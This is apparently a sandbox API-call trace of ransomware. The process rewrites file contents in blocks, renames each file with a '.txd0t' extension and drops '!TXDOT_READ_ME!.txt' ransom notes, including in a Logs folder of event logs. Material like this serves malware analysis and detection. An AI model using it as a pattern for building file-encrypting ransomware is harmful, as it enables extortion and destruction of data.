WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xed90, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xed90, lpOverlapped=0x0) returned 1 [0086.734] FlushFileBuffers (hFile=0x47c) returned 1 [0086.829] GetProcessHeap () returned 0xe30000 [0086.829] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9b648 [0086.829] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" [0086.829] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned="LocalizedData.xml" [0086.829] StrCpyW (in: psz1=0xe9b686, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.829] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3076\\!TXDOT_READ_ME!.txt") returned 1 [0086.829] GetProcessHeap () returned 0xe30000 [0086.829] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0086.829] CloseHandle (hObject=0x47c) returned 1 [0086.829] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.txd0t")) returned 1 [0086.834] SetEvent (hEvent=0x40c) returned 1 [0086.834] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.838] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" [0086.838] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t" [0086.838] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t") returned 0 [0086.838] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml", dwFileAttributes=0x80) returned 1 [0086.838] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0086.839] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=39042) returned 1 [0086.839] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.839] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.840] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff657e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.840] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x9880, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x9880, lpOverlapped=0x0) returned 1 [0086.861] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff6780, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.862] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x9880, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x9880, lpOverlapped=0x0) returned 1 [0086.862] FlushFileBuffers (hFile=0x460) returned 1 [0086.877] GetProcessHeap () returned 0xe30000 [0086.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf6a8 [0086.877] StrCpyW (in: psz1=0xecf6a8, psz2="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" [0086.877] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned="UiInfo.xml" [0086.877] StrCpyW (in: psz1=0xecf6ea, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.877] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Client\\!TXDOT_READ_ME!.txt") returned 0 [0086.877] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\client\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0086.877] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f744*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f740, lpOverlapped=0x0 | out: lpBuffer=0x4a9f744*, lpNumberOfBytesWritten=0x4a9f740*=0x2, lpOverlapped=0x0) returned 1 [0086.878] FlushFileBuffers (hFile=0x47c) returned 1 [0086.883] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f740, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f740*=0x7f0, lpOverlapped=0x0) returned 1 [0086.901] FlushFileBuffers (hFile=0x47c) returned 1 [0086.918] CloseHandle (hObject=0x47c) returned 1 [0086.918] GetProcessHeap () returned 0xe30000 [0086.918] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf6a8 | out: hHeap=0xe30000) returned 1 [0086.918] CloseHandle (hObject=0x460) returned 1 [0086.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.txd0t")) returned 1 [0086.924] SetEvent (hEvent=0x40c) returned 1 [0086.924] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.925] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\header.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" [0086.925] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\header.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.txd0t" [0086.925] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.txd0t") returned 0 [0086.926] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp", dwFileAttributes=0x80) returned 1 [0086.927] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0086.927] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=3628) returned 1 [0086.927] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.927] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.929] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffefd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.929] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0xe20, lpOverlapped=0x0) returned 1 [0086.929] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffff1e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.929] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0xe20, lpOverlapped=0x0) returned 1 [0086.930] FlushFileBuffers (hFile=0x460) returned 1 [0087.154] GetProcessHeap () returned 0xe30000 [0087.154] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf0) returned 0xe9cc28 [0087.154] StrCpyW (in: psz1=0xe9cc28, psz2="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\header.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" [0087.155] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\header.bmp") returned="header.bmp" [0087.155] StrCpyW (in: psz1=0xe9cc5c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.155] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.155] GetProcessHeap () returned 0xe30000 [0087.155] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9cc28 | out: hHeap=0xe30000) returned 1 [0087.155] CloseHandle (hObject=0x460) returned 1 [0087.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.txd0t" (normalized: "c:\\588bce7c90097ed212\\header.bmp.txd0t")) returned 1 [0087.155] SetEvent (hEvent=0x40c) returned 1 [0087.155] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0087.157] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" [0087.157] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t" [0087.157] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t") returned 0 [0087.157] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz", dwFileAttributes=0x80) returned 1 [0087.157] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0087.157] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=43131591) returned 1 [0087.157] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.157] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0087.455] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfd6ddb39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.455] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x100000, lpOverlapped=0x0) returned 1 [0087.825] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.828] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x100000, lpOverlapped=0x0) returned 1 [0087.891] FlushFileBuffers (hFile=0x460) returned 1 [0088.086] GetProcessHeap () returned 0xe30000 [0088.086] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecfbd0 [0088.086] StrCpyW (in: psz1=0xecfbd0, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" [0088.086] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned="netfx_Extended.mzz" [0088.086] StrCpyW (in: psz1=0xecfc04, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.086] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0088.086] GetProcessHeap () returned 0xe30000 [0088.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfbd0 | out: hHeap=0xe30000) returned 1 [0088.086] CloseHandle (hObject=0x460) returned 1 [0088.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.txd0t")) returned 1 [0088.087] SetEvent (hEvent=0x40c) returned 1 [0088.087] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0088.089] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" [0088.089] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t" [0088.089] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t") returned 0 [0088.089] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.091] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0088.091] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0088.092] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.092] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0088.092] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.093] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0088.097] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.098] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0088.098] FlushFileBuffers (hFile=0x460) returned 1 [0088.105] GetProcessHeap () returned 0xe30000 [0088.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0088.105] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" [0088.105] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned="Microsoft-Windows-AppxPackaging%4Operational.evtx" [0088.105] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.105] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.105] GetProcessHeap () returned 0xe30000 [0088.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.105] CloseHandle (hObject=0x460) returned 1 [0088.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.txd0t")) returned 1 [0088.105] SetEvent (hEvent=0x40c) returned 1 [0088.105] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0088.111] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" [0088.111] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t" [0088.111] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t") returned 0 [0088.111] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.111] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0088.111] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0088.112] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.112] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0088.112] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.112] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0088.118] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.118] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0088.119] FlushFileBuffers (hFile=0x464) returned 1 [0088.130] GetProcessHeap () returned 0xe30000 [0088.130] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0088.130] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" [0088.130] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned="Microsoft-Windows-Bits-Client%4Operational.evtx" [0088.130] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.130] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.130] GetProcessHeap () returned 0xe30000 [0088.130] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.130] CloseHandle (hObject=0x464) returned 1 [0088.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.txd0t")) returned 1 [0088.131] SetEvent (hEvent=0x40c) returned 1 [0088.131] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0088.134] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" [0088.134] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t" [0088.134] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t") returned 0 [0088.134] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", dwFileAttributes=0x80) returned 1 [0088.134] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0088.135] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0088.135] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.135] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0088.136] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.136] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0088.143] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.143] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0088.143] FlushFileBuffers (hFile=0x460) returned 1 [0088.517] GetProcessHeap () returned 0xe30000 [0088.517] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0088.517] StrCpyW (in: psz1=0xe9b648, 